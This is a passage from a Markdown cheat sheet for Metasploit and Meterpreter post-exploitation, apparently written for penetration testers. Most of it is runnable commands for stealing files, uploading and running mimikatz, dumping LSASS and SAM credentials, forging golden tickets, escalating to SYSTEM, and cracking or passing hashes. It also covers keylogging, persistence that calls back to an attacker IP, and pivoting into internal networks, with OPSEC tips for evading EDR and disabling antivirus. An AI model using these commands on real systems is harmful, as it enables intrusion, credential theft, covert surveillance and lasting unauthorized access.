metasploit.md (48569B)
1 --- 2 title: "Metasploit Framework" 3 description: "msfconsole and Meterpreter workflow: search, exploits, payloads, sessions, post modules, pivoting." 4 category: exploitation 5 tags: [exploitation, framework, post-exploitation] 6 tools: [Metasploit, msfconsole, Meterpreter] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "vault:Tools/meterpreter.md" 10 --- 11 12 # Metasploit Framework 13 14 --- 15 16 ## Session Management 17 18 > **Note —** + Prerequisites 19 > 1. Successful exploit execution or payload delivery 20 > 2. Network connectivity to handler 21 > 3. Appropriate listener configured in [Metasploit Framework](https://www.metasploit.com/) 22 23 > **Note —** + [Metasploit Framework](https://www.metasploit.com/) Overview 24 > Open-source penetration testing platform for exploit development and execution 25 > 4. Exploit database with thousands of modules 26 > 5. Payload generation and delivery mechanisms 27 > 6. Post-exploitation framework via [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) 28 > 7. Session management and pivoting capabilities 29 30 ### Core Session Commands 31 32 ```bash 33 # In msfconsole 34 sessions -l # List all active sessions 35 sessions -i <ID> # Interact with session 36 sessions -k <ID> # Kill session 37 sessions -K # Kill all sessions 38 sessions -u <ID> # Upgrade shell to Meterpreter (if applicable) 39 background # Background current session (Ctrl+Z) 40 ``` 41 42 > **Note —** + Command Breakdown 43 > 1. **sessions -l**: Displays all active sessions with details (ID, type, target, timestamp) 44 > 2. **-i <ID>**: Interact with specific session number to access [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) prompt 45 > 3. **-v**: Verbose session information including architecture and user context 46 > 4. **-q**: Quiet mode with minimal output for scripting 47 > 5. **-u <ID>**: Upgrades standard shell to full [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session (if architecture matches) 48 > 6. *Check "Last checkin" timestamp to verify session health and connectivity* 49 50 > **Note —** + Session Management Best Practices 51 > 1. Always verify session type and architecture before operations 52 > 2. Background sessions instead of closing to preserve access 53 > 3. Monitor session check-in times for connectivity issues 54 > 4. Upgrade shells to [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) for enhanced capabilities 55 > 5. Name sessions with `-n` flag for easy identification in multi-target engagements 56 57 ### Output Interpretation 58 59 | Column | Description | Notes | 60 |:---|:---|:---| 61 | Session ID | Unique identifier for each connection | Used for all session commands | 62 | Type | [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) (staged/stageless), shell, etc. | Determines available commands | 63 | Info | Target OS, architecture, user context | Critical for payload compatibility | 64 | Last checkin | Timestamp of last communication | Health indicator for session | 65 66 > **Note —** + OPSEC and Detection Considerations 67 > 1. [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) runs in memory (fileless) but creates network traffic patterns 68 > 2. Reverse TCP connections generate outbound traffic—firewall/EDR may alert 69 > 3. Session check-ins create periodic beaconing (default 5 sec)—tune with `set SessionCommunicationTimeout` 70 > 4. Process injection and migration leave forensic traces in memory 71 > 5. Network traffic patterns are signatured by modern EDR solutions 72 73 > **Note —** + Common Errors and Solutions 74 > 6. **"Session X is not valid"**: Session died; check network stability and target system status 75 > 7. **"Exploit completed, but no session was created"**: Payload blocked by AV/EDR or architecture mismatch 76 > 8. **Timeout errors**: Adjust `SessionExpirationTimeout` and `SessionCommunicationTimeout` in handler options 77 > 9. **Connection drops**: Firewall blocking callbacks or target system rebooted 78 79 --- 80 81 ## Navigation and System Information 82 83 > **Note —** + Prerequisites 84 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 85 > 2. User-level access minimum 86 > 3. Understanding of target operating system file structure 87 88 ### Core Navigation Commands 89 90 ```bash 91 sysinfo # System information (OS, arch, hostname) 92 getuid # Current user context 93 pwd # Print working directory 94 ls # List directory contents 95 cd <path> # Change directory 96 cat <file> # Display file contents 97 download <remote> <local> # Download file from target 98 upload <local> <remote> # Upload file to target 99 search -f <pattern> # Search for files 100 ps # List processes 101 shell # Drop to system shell 102 exit # Close Meterpreter session 103 ``` 104 105 > **Note —** + Command Breakdown 106 > 1. **sysinfo**: Returns OS version, architecture (x86/x64), hostname, and domain membership 107 > 2. **getuid**: Shows current user privilege level (SYSTEM, administrator, standard user) 108 > 3. **ls -l**: Long format displaying permissions, timestamps, and file sizes 109 > 4. **download -r <dir>**: Recursive download of entire directory structure 110 > 5. **search -d <dir> -f <pattern>**: Search specific directory for filename patterns 111 > 6. **ps -S <name>**: Filter process list by name for quick identification 112 > 7. *File operations generate disk I/O that may trigger EDR monitoring* 113 114 ### File Search and Enumeration 115 116 ```bash 117 # Navigate and exfiltrate 118 cd C:\\Users\\victim\\Documents 119 ls 120 download sensitive.docx /tmp/loot/ 121 122 # Upload tool 123 upload /opt/tools/mimikatz.exe C:\\Windows\\Temp\\m.exe 124 125 # Find files 126 search -f *.kdbx 127 search -d C:\\Users -f *password* 128 129 # Process enumeration 130 ps 131 ps -S lsass.exe 132 ``` 133 134 > **Note —** + Search Command Breakdown 135 > 1. **search -f *.kdbx**: Locate [KeePass](https://keepass.info/) database files containing credentials 136 > 2. **-d C:\\Users**: Limits search scope to specific directory for faster results 137 > 3. **\*password\***: Wildcard pattern matching for files containing "password" in filename 138 > 4. *Search operations generate high disk I/O and may be detected by behavioral analysis* 139 140 ### Process Enumeration Analysis 141 142 > **Note —** + Process List Interpretation 143 > 1. Look for security products (Windows Defender, CrowdStrike, Carbon Black) 144 > 2. Identify high-value processes ([lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) for credentials, browsers for sessions) 145 > 3. Note process architecture (x86/x64) for migration compatibility 146 > 4. Check process ownership to identify privilege levels 147 148 > **Note —** + OPSEC and Detection Considerations 149 > 1. File operations (`download`, `upload`, `cat`) generate disk I/O—EDR may flag 150 > 2. `shell` drops to cmd.exe/bash—creates child process and logs ([Windows Event 4688](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688)) 151 > 3. Excessive `ls` or `search` commands indicate enumeration behavior pattern 152 > 4. Timestomping not automatic—use `timestomp` separately if needed for stealth 153 > 5. File access generates [Windows Event 4663](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663) (object access) 154 155 > **Note —** + Common Errors and Solutions 156 > 6. **"Operation failed: Access is denied"**: Insufficient privileges or file in use by system 157 > 7. **"Download failed"**: Verify target file path, permissions, and disk space on attacker system 158 > 8. **shell hangs**: Adjust `read` timeout or use `execute -f cmd.exe -i -c` for interactive shell 159 > 9. **Path errors on Windows**: Use double-backslashes or forward slashes in paths 160 161 --- 162 163 ## Credential Extraction with Kiwi (Mimikatz) 164 165 > **Note —** + High Detection Risk Warning 166 > [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) is heavily signatured by AV/EDR. Opening lsass.exe triggers alerts on mature EDR platforms (Defender ATP, CrowdStrike, SentinelOne). Consider alternatives: procdump → parse offline, or native comsvcs.dll method. 167 168 > **Note —** + Prerequisites 169 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session on Windows target 170 > 2. SYSTEM or Administrator privileges (for most functions) 171 > 3. Target process with credentials in memory ([lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection)) 172 > 4. Kiwi module available in [Metasploit](https://www.metasploit.com/) 173 174 > **Note —** + [Mimikatz](https://github.com/gentilkiwi/mimikatz) Overview 175 > Post-exploitation tool for extracting plaintext passwords, hashes, and Kerberos tickets from Windows memory 176 > 1. Dumps credentials from [LSASS](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) (Local Security Authority Subsystem Service) 177 > 2. Extracts [Kerberos](https://web.mit.edu/kerberos/) tickets for Pass-the-Ticket attacks 178 > 3. Creates [Golden Tickets](https://attack.mitre.org/techniques/T1558/001/) for domain persistence 179 > 4. Bypasses authentication mechanisms in Windows environments 180 181 ### Core Kiwi Commands 182 183 ```bash 184 load kiwi # Load Kiwi extension 185 kiwi_cmd # Execute raw Mimikatz command 186 creds_all # Dump all credentials (msv, kerberos, wdigest, etc.) 187 creds_msv # Dump NTLM hashes (MSV) 188 creds_kerberos # Dump Kerberos tickets 189 creds_wdigest # Dump WDigest credentials (plaintext if enabled) 190 creds_ssp # Dump SSP credentials 191 creds_tspkg # Dump TsPkg credentials 192 lsa_dump_sam # Dump local SAM hashes 193 lsa_dump_secrets # Dump LSA secrets 194 golden_ticket_create # Create Kerberos Golden Ticket 195 ``` 196 197 > **Note —** + Command Breakdown 198 > 1. **load kiwi**: Loads [Mimikatz](https://github.com/gentilkiwi/mimikatz) extension into [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session (architecture must match) 199 > 2. **creds_all**: Attempts all credential extraction methods simultaneously 200 > 3. **creds_msv**: Extracts NTLM hashes from MSV1_0 authentication package 201 > 4. **creds_wdigest**: Extracts plaintext passwords (Windows 7/2008R2 only, disabled by default on 10+) 202 > 5. **lsa_dump_sam**: Dumps local SAM database hashes (equivalent to `hashdump`) 203 > 6. *Commands auto-execute in SYSTEM context if migrated to appropriate process* 204 205 ### Practical Credential Extraction 206 207 ```bash 208 # Load Kiwi module 209 load kiwi 210 211 # Dump all credential types 212 creds_all 213 214 # Dump only NTLM hashes 215 creds_msv 216 217 # Dump Kerberos tickets 218 creds_kerberos 219 220 # Dump local SAM database 221 lsa_dump_sam 222 223 # Execute custom Mimikatz command 224 kiwi_cmd "sekurlsa::logonpasswords" 225 226 # Create Golden Ticket (requires krbtgt hash) 227 golden_ticket_create -d domain.local -u Administrator -s <SID> -k <NTLM_hash> 228 ``` 229 230 > **Note —** + Output Interpretation 231 > 1. **Authentication Id**: Correlates credentials to specific logon sessions 232 > 2. **User Name**: Account associated with credentials 233 > 3. **NTLM hashes**: Use for [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) attacks 234 > 4. **Kerberos tickets**: Extract .kirbi files for [Pass-the-Ticket](https://attack.mitre.org/techniques/T1550/003/) or Overpass-the-Hash 235 > 5. **WDigest**: Plaintext passwords (only on Windows 7/2008R2 or if manually enabled) 236 237 ### Credential Attack Techniques 238 239 | Credential Type | Attack Method | Use Case | 240 |:---|:---|:---| 241 | NTLM Hash | [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) | Lateral movement without plaintext password | 242 | Kerberos Ticket | [Pass-the-Ticket](https://attack.mitre.org/techniques/T1550/003/) | Impersonate user sessions | 243 | WDigest Plaintext | Direct authentication | Access services requiring password | 244 | krbtgt Hash | [Golden Ticket](https://attack.mitre.org/techniques/T1558/001/) | Domain-level persistence | 245 246 > **Note —** + OPSEC and Detection Considerations 247 > 1. **HIGH DETECTION RISK**: [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) heavily signatured by AV/EDR 248 > 2. Opening [lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) triggers alerts on mature EDR (Defender ATP, CrowdStrike, SentinelOne) 249 > 3. [Windows Event 4656](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (handle to lsass.exe) + [4663](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663) (lsass.exe read) = common detection 250 > 4. [Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard) (Windows 10+) blocks many [Mimikatz](https://github.com/gentilkiwi/mimikatz) techniques 251 > 5. Memory scanning will detect [Mimikatz](https://github.com/gentilkiwi/mimikatz) strings/patterns 252 > 6. Consider alternatives: [procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) → parse offline, or native comsvcs.dll method 253 254 > **Note —** + Common Errors and Solutions 255 > 1. **"Load Mimikatz failed"**: Anti-virus blocked; migrate to different process or disable AV 256 > 2. **"Access is denied" / "ERROR kuhl_m_sekurlsa"**: Not running as SYSTEM—use `getsystem` first 257 > 3. **"No credentials found"**: WDigest disabled (Windows 10+); rely on NTLM hashes instead 258 > 4. **Kiwi module not available**: Update [Metasploit](https://www.metasploit.com/) or use standalone [Mimikatz](https://github.com/gentilkiwi/mimikatz) 259 > 5. **Architecture mismatch**: Ensure [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session matches target (x64 for x64 Windows) 260 261 > **Note —** + Alternative Credential Extraction Methods 262 > 6. **procdump + offline parsing**: Less noisy, avoids real-time EDR hooks 263 > 7. **comsvcs.dll method**: Native Windows DLL for LSASS dumping 264 > 8. **Task Manager dump**: Manual method, less suspicious than automated tools 265 > 9. **SSP/AP registration**: Custom Security Support Provider for credential interception 266 > 10. **Registry hive extraction**: Export SAM/SYSTEM hives for offline cracking 267 268 --- 269 270 ## Privilege Escalation 271 272 > **Note —** + Prerequisites 273 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 274 > 2. User-level access minimum 275 > 3. Exploitable privilege escalation vector (misconfiguration, unpatched vulnerability) 276 > 4. Understanding of target Windows version and patch level 277 278 ### Core Privilege Escalation Commands 279 280 ```bash 281 getsystem # Attempt automatic privilege escalation 282 getprivs # Display current process privileges 283 use post/multi/recon/local_exploit_suggester # Suggest priv-esc exploits 284 use exploit/windows/local/* # Local exploit modules 285 run post/windows/gather/win_privs # Enumerate Windows privileges 286 ``` 287 288 > **Note —** + Command Breakdown 289 > 1. **getsystem**: Tries multiple techniques (named pipe impersonation, token duplication) 290 > 2. **-t flag**: Specify technique: `getsystem -t 1` (technique 1: named pipe impersonation) 291 > 3. **getprivs**: Lists current process [privileges](https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants) (SeDebugPrivilege, SeImpersonatePrivilege critical) 292 > 4. **local_exploit_suggester**: Compares installed patches against known privilege escalation exploits 293 > 5. *Always run `getuid` and `getprivs` before attempting escalation* 294 295 ### Privilege Escalation Workflow 296 297 ```bash 298 # Check current privileges 299 getuid 300 getprivs 301 302 # Attempt automatic escalation 303 getsystem 304 305 # If getsystem fails, background and run suggester 306 background 307 use post/multi/recon/local_exploit_suggester 308 set SESSION 1 309 run 310 311 # Run suggested exploit 312 use exploit/windows/local/ms16_075_reflection 313 set SESSION 1 314 set LHOST <your_IP> 315 run 316 317 # Verify escalation 318 getuid # Should show "NT AUTHORITY\SYSTEM" 319 ``` 320 321 > **Note —** + Privilege Escalation Technique Analysis 322 > 1. **Technique 0 (Named Pipe Impersonation)**: Creates named pipe, impersonates SYSTEM token 323 > 2. **Technique 1 (Token Duplication)**: Duplicates existing SYSTEM token from service process 324 > 3. **Technique 2 (Named Pipe Impersonation - Alternative)**: Variation of technique 0 325 > 4. *Modern Windows (10+) has protections against named pipe impersonation attacks* 326 327 ### Important Windows Privileges 328 329 | Privilege | Attack Method | Description | 330 |:---|:---|:---| 331 | SeDebugPrivilege | Process injection | Debug and inject into any process | 332 | SeImpersonatePrivilege | [Potato attacks](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | Impersonate tokens (RoguePotato, PrintSpoofer) | 333 | SeBackupPrivilege | File access | Read any file on system | 334 | SeRestorePrivilege | File modification | Write to any file on system | 335 | SeLoadDriverPrivilege | Kernel exploit | Load unsigned drivers | 336 337 > **Note —** + OPSEC and Detection Considerations 338 > 1. `getsystem` creates named pipes—EDR may detect pattern (e.g., `\\\\.\\pipe\\random`) 339 > 2. Token manipulation = suspicious API calls (OpenProcess, DuplicateTokenEx) 340 > 3. Local exploits may crash processes or generate kernel logs 341 > 4. Prefer misconfigurations (unquoted service paths, weak permissions) over exploits when possible 342 > 5. [Windows Event 4673](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673) logs sensitive privilege use 343 344 > **Note —** + Common Errors and Solutions 345 > 6. **"Operation failed: Access is denied"**: Technique blocked by OS or AV; try alternative method 346 > 7. **"Could not obtain SYSTEM"**: No exploitable path; enumerate manually or use external tool 347 > 8. **Exploit crashes session**: Unstable target or wrong OS version—check `sysinfo` first 348 > 9. **Suggester returns no results**: System fully patched; focus on misconfigurations 349 350 > **Note —** + Alternative Privilege Escalation Vectors 351 > 10. **Unquoted Service Paths**: Service paths with spaces and no quotes 352 > 11. **Weak Service Permissions**: Services modifiable by low-privilege users 353 > 12. **Always Install Elevated**: Registry setting allowing MSI installation as SYSTEM 354 > 13. **Scheduled Tasks**: Tasks running as SYSTEM with writable binaries 355 > 14. **DLL Hijacking**: Missing DLLs in service search paths 356 357 --- 358 359 ## Local Hash Extraction (Non-Kiwi) 360 361 > **Note —** + Prerequisites 362 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session on Windows 363 > 2. SYSTEM or Administrator privileges 364 > 3. Access to [SAM](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-processes-in-windows-authentication)/SYSTEM registry hives 365 366 ### Core Hash Extraction Commands 367 368 ```bash 369 hashdump # Dump local SAM password hashes 370 run post/windows/gather/credentials/credential_collector # Collect multiple credential sources 371 run post/windows/gather/smart_hashdump # Dump hashes from SAM & domain cache 372 ``` 373 374 > **Note —** + Command Breakdown 375 > 1. **hashdump**: Classic command requiring SYSTEM privileges for registry access 376 > 2. **credential_collector**: Comprehensive module collecting from multiple sources (SAM, LSA, registry) 377 > 3. **smart_hashdump**: Enhanced version with domain cache support and better error handling 378 > 4. *Always escalate to SYSTEM with `getsystem` before hash extraction* 379 380 ### Hash Extraction Workflow 381 382 ```bash 383 # Escalate to SYSTEM 384 getsystem 385 386 # Dump local hashes 387 hashdump 388 389 # Alternative: Run smart_hashdump module 390 background 391 use post/windows/gather/smart_hashdump 392 set SESSION 1 393 run 394 395 # Collect all available credentials 396 use post/windows/gather/credentials/credential_collector 397 set SESSION 1 398 run 399 ``` 400 401 > **Note —** + Hash Format Output Interpretation 402 > **Format**: `username:RID:LM_hash:NTLM_hash:::` 403 > 1. **LM hash**: Often `aad3b435b51404eeaad3b435b51404ee` (empty/disabled on modern Windows) 404 > 2. **NTLM hash**: Modern hash format for [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) attacks or offline cracking 405 > 3. **RID 500**: Built-in Administrator account (high-value target) 406 > 4. **RID 501**: Built-in Guest account (usually disabled) 407 408 ### Hash Attack Techniques 409 410 | Hash Type | Tool | Command Example | 411 |:---|:---|:---| 412 | NTLM | [hashcat](https://hashcat.net/hashcat/) | `hashcat -m 1000 hashes.txt rockyou.txt` | 413 | NTLM | [John the Ripper](https://www.openwall.com/john/) | `john --format=NT hashes.txt` | 414 | LM | [hashcat](https://hashcat.net/hashcat/) | `hashcat -m 3000 hashes.txt rockyou.txt` | 415 | Pass-the-Hash | [Impacket](https://github.com/SecureAuthCorp/impacket) | `psexec.py -hashes :NTLM admin@target` | 416 417 > **Note —** + OPSEC and Detection Considerations 418 > 1. Reading [SAM](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-processes-in-windows-authentication) registry hive is detectable (registry access events) 419 > 2. Less noisy than [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) but still generates logs 420 > 3. Consider exfiltrating registry hives manually (`reg save HKLM\\SAM`, `reg save HKLM\\SYSTEM`) for offline extraction 421 > 4. File `%SystemRoot%\\System32\\config\\SAM` locked while OS running—use registry hive method 422 > 5. [Windows Event 4657](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657) logs registry value modifications 423 424 > **Note —** + Common Errors and Solutions 425 > 6. **"Access is denied"**: Not SYSTEM—run `getsystem` first before hash extraction 426 > 7. **"Failed to dump hashes"**: SAM database locked or corrupted; try `smart_hashdump` or registry export 427 > 8. **Empty hash output**: Target is domain-joined with no local accounts used 428 > 9. **Module fails**: Try classic `hashdump` command instead of post modules 429 430 > **Note —** + Offline Hash Extraction Alternative 431 > 10. Export registry hives: `reg save HKLM\\SAM sam.hive` and `reg save HKLM\\SYSTEM system.hive` 432 > 11. Download hives from target system 433 > 12. Extract locally using [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) from [Impacket](https://github.com/SecureAuthCorp/impacket) 434 > 13. Less detection risk (no LSASS interaction, standard registry operations) 435 436 --- 437 438 ## Screenshot and Keylogging 439 440 > **Note —** + Prerequisites 441 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 442 > 2. User-level access (screenshots require active GUI session) 443 > 3. Keylogger requires injection into user process (explorer.exe, browser) 444 > 4. Active desktop session (RDP, physical console, or virtual desktop) 445 446 ### Core Surveillance Commands 447 448 ```bash 449 screenshot # Capture single screenshot 450 screenshare # Stream live screenshots 451 keyscan_start # Start keylogger 452 keyscan_dump # Dump captured keystrokes 453 keyscan_stop # Stop keylogger 454 ``` 455 456 > **Note —** + Command Breakdown 457 > 1. **screenshot -v false**: Disable automatic view/display of captured screenshot 458 > 2. **screenshot -p <path>**: Save screenshot to specific file path 459 > 3. **screenshare -q <quality>**: Set JPEG quality (1-100) for bandwidth optimization 460 > 4. **keyscan_start**: Hooks keyboard input at OS level 461 > 5. *Migrate to explorer.exe or browser process before starting keylogger for stability* 462 463 ### Surveillance Workflow 464 465 ```bash 466 # Capture screenshot 467 screenshot 468 469 # Save screenshot to specific file 470 screenshot -p /tmp/loot/desktop.png 471 472 # Stream screenshots (real-time) 473 screenshare 474 475 # Start keylogger 476 keyscan_start 477 478 # Wait, then dump keystrokes 479 keyscan_dump 480 481 # Stop keylogger 482 keyscan_stop 483 ``` 484 485 > **Note —** + Output Interpretation 486 > 1. **Screenshot**: Saved to local attacker system; check for sensitive data on screen (passwords, documents) 487 > 2. **Keystroke dump**: Plain text; look for passwords typed in forms or applications 488 > 3. **Parse keylogs**: Search for credentials (login forms, password managers, terminal commands) 489 > 4. **Timestamp analysis**: Correlate keystrokes with user activity patterns 490 491 > **Note —** + OPSEC and Detection Considerations 492 > 1. `screenshot` uses Windows GDI API—low detection but generates memory artifacts 493 > 2. `screenshare` creates persistent network traffic (bandwidth spike)—may alert network operations 494 > 3. Keylogger hooks keyboard input—EDR detects SetWindowsHookEx, GetAsyncKeyState APIs 495 > 4. Migrate to explorer.exe or browser for keylogger stability and stealth 496 > 5. AV signatures exist for [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) keylogger patterns 497 > 6. Memory forensics can detect injected keylogger code 498 499 > **Note —** + Common Errors and Solutions 500 > 1. **"No active desktop session"**: RDP/GUI not active; screenshots fail on Server Core or no logged-in user 501 > 2. **"Could not start keylogger"**: Injection failed—try migrating to different process (explorer.exe) 502 > 3. **Screenshot blank/black**: Target using Citrix/RDP session with restricted display capture 503 > 4. **Keylogger crashes**: Process terminated or protected by security software 504 505 > **Note —** + Keylogger Best Practices 506 > 1. Migrate to stable, long-running process (explorer.exe) before starting 507 > 2. Dump keystrokes periodically to avoid losing data if session dies 508 > 3. Parse output for credential patterns (username/password forms) 509 > 4. Consider process-specific keylogging for targeted data collection 510 > 5. Stop keylogger when not actively collecting to reduce detection risk 511 512 --- 513 514 ## Persistence Mechanisms 515 516 > **Note —** + High Detection Risk Warning 517 > Persistence mechanisms leave indicators of compromise (IOCs) on disk and in registry. These are heavily monitored by EDR and will generate alerts. Always document IOCs for post-engagement remediation. 518 519 > **Note —** + Prerequisites 520 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 521 > 2. Administrator or SYSTEM privileges (for system-wide persistence) 522 > 3. Write access to startup folders, registry, or scheduled tasks 523 > 4. Understanding of target security monitoring capabilities 524 525 ### Core Persistence Commands 526 527 ```bash 528 run persistence -h # Show persistence options (deprecated; use module) 529 run exploit/windows/local/persistence_service # Install as Windows service 530 ``` 531 532 > **Note —** + Persistence Options (Legacy) 533 > 1. **-U**: User-level persistence (HKCU startup)—survives only for specific user 534 > 2. **-X**: System-level persistence (HKLM startup, requires admin)—survives all users 535 > 3. **-i <seconds>**: Callback interval between beacon connections 536 > 4. **-r <IP>**: Reverse connection IP address for callback 537 > 5. *Legacy `run persistence` script deprecated in Metasploit 6.x—use post modules instead* 538 539 ### Modern Persistence Implementation 540 541 ```bash 542 # Legacy persistence (if available) 543 run persistence -U -i 60 -p 443 -r <your_IP> 544 545 # Modern method: Use post module 546 background 547 use exploit/windows/local/persistence_service 548 set SESSION 1 549 set LHOST <your_IP> 550 set LPORT 443 551 run 552 553 # Alternative: Manual registry key 554 execute -f reg -a "add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Windows\\Temp\\payload.exe" 555 556 # Scheduled task persistence 557 execute -f schtasks -a "/create /tn \"Updater\" /tr C:\\Windows\\Temp\\payload.exe /sc onlogon /ru System" 558 ``` 559 560 > **Note —** + Persistence Technique Breakdown 561 > 1. **Registry Run keys**: Executes on user logon (HKCU) or system boot (HKLM) 562 > 2. **Windows Service**: Runs as service with SYSTEM privileges 563 > 3. **Scheduled Task**: Flexible triggers (logon, boot, time-based) 564 > 4. **WMI Event Subscription**: Stealthy, survives reboots, difficult to detect 565 > 5. *Always save cleanup script path from module output for IOC removal* 566 567 ### Persistence Technique Comparison 568 569 | Technique | Privilege Required | Stealth | Detection Method | 570 |:---|:---|:---|:---| 571 | Registry Run Key | User | Low | [Event 4657](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657), Registry monitoring | 572 | Windows Service | Administrator | Low | [Event 7045](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-7045), Service enumeration | 573 | Scheduled Task | Administrator | Medium | [Event 4698](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698), Task enumeration | 574 | WMI Event | Administrator | High | WMI repository inspection | 575 | DLL Hijacking | User/Admin | High | Process monitoring, DLL auditing | 576 577 > **Note —** + OPSEC and Detection Considerations 578 > 1. **HIGH DETECTION RISK**: Persistence = IOC left on disk/registry 579 > 2. Registry Run keys (HKCU/HKLM `\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`) heavily monitored 580 > 3. Scheduled tasks generate [Event 4698](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698) (Windows Security Log)—blue teams watch this 581 > 4. Service creation = [Event 7045](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-7045) (System Log)—immediate alert trigger 582 > 5. Payload on disk = AV/EDR will scan and likely detect 583 > 6. Consider WMI, WMI Event Subscriptions, or DLL hijacking for stealthier persistence 584 > 7. Always have cleanup plan and document IOCs for post-test remediation 585 586 > **Note —** + Common Errors and Solutions 587 > 8. **"Insufficient privileges"**: Requires admin for HKLM/service persistence; try user-level `-U` 588 > 9. **"Could not write payload"**: AV deleted file or path doesn't exist—check permissions 589 > 10. **Session not re-connecting**: Firewall blocked outbound, wrong IP/port, or payload detected 590 > 11. **Module fails**: Deprecated script; update [Metasploit](https://www.metasploit.com/) or use alternative module 591 592 > **Note —** + Stealthier Persistence Alternatives 593 > 12. **WMI Event Subscriptions**: Harder to detect, survives reboots 594 > 13. **DLL Hijacking**: Legitimate process loads malicious DLL 595 > 14. **COM Hijacking**: Redirects COM object instantiation 596 > 15. **Accessibility Features**: Replace sethc.exe, utilman.exe (requires SYSTEM) 597 > 16. **AppInit_DLLs**: Injects DLL into all processes (Windows 7 only) 598 599 --- 600 601 ## Pivoting and Port Forwarding 602 603 > **Note —** + Prerequisites 604 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 605 > 2. Target host multi-homed (connected to multiple networks) 606 > 3. Understanding of target network topology and segmentation 607 > 4. [proxychains](https://github.com/haad/proxychains) or similar tool for SOCKS proxying 608 609 > **Note —** + [proxychains](https://github.com/haad/proxychains) Overview 610 > Tool for forcing network traffic through SOCKS or HTTP proxies 611 > 1. Tunnels application traffic through proxy chains 612 > 2. Supports SOCKS4, SOCKS5, and HTTP proxies 613 > 3. Dynamic or strict proxy chain modes 614 > 4. Essential for pivoting through compromised hosts 615 616 ### Core Pivoting Commands 617 618 ```bash 619 run autoroute -h # Add routes through Meterpreter session 620 run autoroute -s <subnet> # Add subnet route 621 portfwd -h # Port forwarding help 622 portfwd add -l <local_port> -p <target_port> -r <target_IP> # Forward port 623 portfwd list # List active forwards 624 portfwd delete -l <local_port> # Remove forward 625 ``` 626 627 > **Note —** + Command Breakdown 628 > 1. **autoroute -s <subnet/CIDR>**: Route network traffic through [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 629 > 2. **portfwd add -L <bind_IP>**: Specify local bind IP for port forwarding 630 > 3. **portfwd -R**: Reverse port forward (target to attacker; less common) 631 > 4. **autoroute -p**: Display all configured routes and associated sessions 632 > 5. *Always verify target network interfaces with `ipconfig`/`ifconfig` before adding routes* 633 634 ### Pivoting Workflow 635 636 ```bash 637 # View target network interfaces 638 ipconfig # Windows 639 ifconfig # Linux 640 641 # Add route to internal subnet 642 run autoroute -s 10.10.10.0/24 643 644 # Verify route added 645 run autoroute -p 646 647 # Forward RDP port from internal host 648 portfwd add -l 3389 -p 3389 -r 10.10.10.50 649 650 # Access via localhost 651 xfreerdp /v:127.0.0.1 /u:admin 652 653 # Set up SOCKS proxy for full pivoting 654 background 655 use auxiliary/server/socks_proxy 656 set SRVHOST 127.0.0.1 657 set SRVPORT 1080 658 set VERSION 4a 659 run -j 660 661 # Configure proxychains and scan internal network 662 # Edit /etc/proxychains4.conf: socks4 127.0.0.1 1080 663 proxychains nmap -sT -Pn 10.10.10.0/24 664 ``` 665 666 > **Note —** + SOCKS Proxy Setup Breakdown 667 > 1. **SRVHOST 127.0.0.1**: Bind proxy server to 